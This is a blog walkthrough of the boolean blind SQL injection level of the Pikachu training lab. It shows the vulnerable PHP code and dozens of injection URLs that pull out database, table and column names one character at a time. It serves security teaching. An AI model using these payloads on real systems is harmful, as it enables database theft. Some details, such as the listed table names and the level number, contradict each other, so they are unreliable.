pikachu靶场通关笔记25 SQL注入08-布尔盲注(base on boolian 手工注入+脚本注入 两种方法渗透)

于 2025-06-11 11:04:44 发布
阅读量1.3k 收藏 27
点赞数 31
CC 4.0 BY-SA版权
分类专栏: pikachu靶场 文章标签: pikachu靶场 SQL注入漏洞 布尔盲注 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mooyuan/article/details/147723312

目录

一、SQL注入

二、布尔盲注

三、源码分析

四、渗透实战

1、SQL注入探测

(1)输入已有账户

(2)输入不存在账户

(3)输入单引号等可能报错的情况

2、手工注入

(1)探测数据库名

(2)探测表名

(3)探测列名

(4)探测数据

3、sqlmap渗透

本系列为通过《pikachu靶场通关笔记》的SQL注入关卡(共10关)渗透集合,通过对布尔盲注(base on boolian)关卡源码的代码审计找到SQL注入风险的真实原因,讲解布尔盲注(base on boolian)的原理并进行渗透实践,本文为SQL注入09之布尔盲注(base on boolian)关卡的渗透部分。

一、SQL注入

SQL注入攻击主要形成的原因是在进行SQL数据语句交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。

二、布尔盲注

布尔盲注是 SQL 注入攻击中的一种技术,当应用程序在执行 SQL 查询后,仅返回两种不同的结果(如页面正常显示或异常显示、返回 “true” 或 “false”),而不返回详细的数据库错误信息或查询结果时,攻击者可以利用这种特性,通过构造一系列布尔条件查询,根据应用程序的响应情况来推断数据库中的信息,逐步获取数据库的敏感内容。

布尔盲注的核心原理是利用 SQL 语句中的布尔表达式进行条件判断。攻击者通过不断构造不同的布尔条件,观察应用程序的响应结果(如页面状态、返回内容等)来确定条件是否成立,从而逐步获取数据库的信息,如数据库名、表名、列名和数据内容等。

布尔盲注的渗透步骤如下所示。

步骤具体操作
判断注入点提交特殊字符(如单引号')观察应用程序响应,若页面异常(报错、显示异常信息等),可能存在注入点
确定数据库长度构造布尔条件,不断尝试不同长度值,根据应用程序响应(正常显示表示条件成立,异常显示表示不成立)确定数据库名长度
逐字符获取数据库名使用SUBSTRING截取字符,ASCII转换为 ASCII 码,不断尝试不同 ASCII 码值,根据响应确定该位置字符
获取表名长度information_schema表中获取表名长度,构造布尔条件,尝试不同长度值确定第一个表名长度
逐字符获取表名类似获取数据库名,从information_schema表中逐字符获取表名
获取列名和数据重复上述逐字符获取的方法,从information_schema表中获取列名,进而获取数据

三、源码分析

打开pikachu靶场的SQL注入-布尔盲注型关卡对应的源码sqli_blind_b.php,具体如下所示。

这段 PHP 代码实现了一个简单的用户信息查询功能。当用户通过 GET 方法提交包含 submit 参数和 name 参数的表单时,代码会将 name 参数的值直接拼接到 SQL 查询语句中,从 member 表中查询 username 等于该值的记录的 id 和 email 信息。如果查询到一条记录,则将该记录的 id 和 email 信息以 HTML 段落的形式显示出来;如果没有查询到记录,则提示用户输入的 username 不存在。经过注释后的代码如下所示。

<?php
// 调用 connect 函数建立与数据库的连接,并将连接对象赋值给变量 $link
$link = connect();

// 初始化用于存储 HTML 内容的变量,用于后续显示查询结果或提示信息
$html = '';

// 检查是否通过 GET 方法提交了表单,并且表单中名为 'name' 的字段不为空
if (isset($_GET['submit']) && $_GET['name'] != null) {
    // 直接获取用户通过 GET 方法提交的 'name' 参数值,未做任何处理
    $name = $_GET['name'];

    // 构造一个 SQL 查询语句,用于从 member 表中选取 username 等于用户输入值的记录的 id 和 email 字段
    // 由于 'name' 是字符型,在 SQL 语句中需要用单引号括起来,这里存在 SQL 注入风险
    $query = "select id,email from member where username='$name'";

    // 使用 mysqli_query 函数执行构造好的 SQL 查询语句
    // mysqli_query 函数执行查询时不会打印详细的错误描述,这使得即使存在注入也较难判断
    $result = mysqli_query($link, $query);

    // 检查查询结果集是否有效,并且结果集中的行数是否为 1
    if ($result && mysqli_num_rows($result) == 1) {
        // 当结果集中有且仅有一条记录时,使用 while 循环逐行获取结果集的数据
        while ($data = mysqli_fetch_assoc($result)) {
            // 从关联数组 $data 中获取 'id' 字段的值,并赋值给变量 $id
            $id = $data['id'];
            // 从关联数组 $data 中获取 'email' 字段的值,并赋值给变量 $email
            $email = $data['email'];
            // 将用户信息拼接成 HTML 字符串,添加到变量 $html 中
            $html .= "<p class='notice'>your uid:{$id} <br />your email is: {$email}</p>";
        }
    } else {
        // 如果结果集中没有记录或者查询失败,将提示信息拼接成 HTML 字符串,添加到变量 $html 中
        $html .= "<p class='notice'>您输入的 username 不存在,请重新输入!</p>";
    }
}
?>

代码存在 SQL 布尔注入安全风险,关键在于对用户通过 GET 方法提交的 name 参数未做任何处理。直接把 $_GET['name'] 拼接到 SQL 查询语句里,没有对其进行有效性验证和过滤。攻击者能够利用SQL注入风险,构造特殊的输入改变 SQL 语句的逻辑,通过判断页面返回的不同提示信息(查询到记录和未查询到记录的提示)来逐步获取数据库中的敏感信息。

四、渗透实战

1、SQL注入探测

(1)输入已有账户

如下所示,当输入存在的账户时,输出账户的id和邮箱地址。

(2)输入不存在账户

当输入不存在的账户时,以输入“mooyuan---”为主,提示“您输入的username不存在,请重新输入”,如下所示。

(3)输入单引号等可能报错的情况

当输入单引号时,原本在第02关等会出现SQL报错信息的情况,在本关卡没有报错信息,只是提示“您输入的username不存在,请重新输入”,如下所示。

对比第2关卡同样的单引号输入后,字符型会出现报错,如下所示。

2、手工注入

(1)探测数据库名

如下所示,数据库名的长度为7,名字为pikachu。

[+] 第一步:探测数据库名
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH(DATABASE()) = 7) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
数据库名长度:7
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING(DATABASE(), 1, 1) = 'p') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING(DATABASE(), 2, 1) = 'i') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING(DATABASE(), 3, 1) = 'k') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING(DATABASE(), 4, 1) = 'a') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING(DATABASE(), 5, 1) = 'c') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING(DATABASE(), 6, 1) = 'h') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING(DATABASE(), 7, 1) = 'u') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
数据库名:pikachu

(2)探测表名

如下所示,pikachu数据库共有5个表格,分别为emails,httpinfo,member,users和xss_blind。

[+] 第二步:探测表信息
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN ((SELECT COUNT(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu') > 4) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN ((SELECT COUNT(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu') = 5) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
表数量:5
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 0,1)) = 8) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
[+] 表名长度: 8
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 0,1), 1, 1) = 'h') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 0,1), 2, 1) = 't') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 0,1), 3, 1) = 't') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 0,1), 4, 1) = 'p') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 0,1), 5, 1) = 'i') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 0,1), 6, 1) = 'n') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 0,1), 7, 1) = 'f') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 0,1), 8, 1) = 'o') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询

表 1: httpinfo
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 1,1)) > 4) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 1,1)) = 6) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
[+] 表名长度: 6
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 1,1), 1, 1) = 'm') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 1,1), 2, 1) = 'e') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 1,1), 3, 1) = 'm') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 1,1), 4, 1) = 'b') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 1,1), 5, 1) = 'e') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 1,1), 6, 1) = 'r') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询

表 2: member
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 2,1)) > 4) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 2,1)) > 6) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 2,1)) = 7) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
[+] 表名长度: 7
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 2,1), 1, 1) = 'm') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 2,1), 2, 1) = 'e') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 2,1), 3, 1) = 's') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 2,1), 4, 1) = 's') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 2,1), 5, 1) = 'a') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 2,1), 6, 1) = 'g') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 2,1), 7, 1) = 'e') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询

表 3: message
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 3,1)) > 4) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 3,1)) = 5) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
[+] 表名长度: 5
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 3,1), 1, 1) = 'u') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 3,1), 2, 1) = 's') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 3,1), 3, 1) = 'e') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 3,1), 4, 1) = 'r') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 3,1), 5, 1) = 's') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询

表 4: users
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 4,1)) = 8) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
[+] 表名长度: 8
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 4,1), 1, 1) = 'x') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 4,1), 2, 1) = 's') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 4,1), 3, 1) = 's') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 4,1), 4, 1) = 'b') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 4,1), 5, 1) = 'l') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 4,1), 6, 1) = 'i') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 4,1), 7, 1) = 'n') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 4,1), 8, 1) = 'd') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询

表 5: xssblind

(3)探测列名

如下所示,users表共有四列,分别为id,username,password和level。

[+] 第三步:探测表 users 的列
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN ((SELECT COUNT(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users') = 4) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
列数量:4
[*] 正在探测表 users 的第 1 列名...
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 0,1)) = 2) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
[+] 列名长度: 2
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 0,1), 1, 1) = 'i') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 0,1), 2, 1) = 'd') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询

[+] 列名: id
列 1: id
[*] 正在探测表 users 的第 2 列名...
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 1,1)) = 8) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
[+] 列名长度: 8
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 1,1), 1, 1) = 'u') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 1,1), 2, 1) = 's') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 1,1), 3, 1) = 'e') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 1,1), 4, 1) = 'r') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 1,1), 5, 1) = 'n') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 1,1), 6, 1) = 'a') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
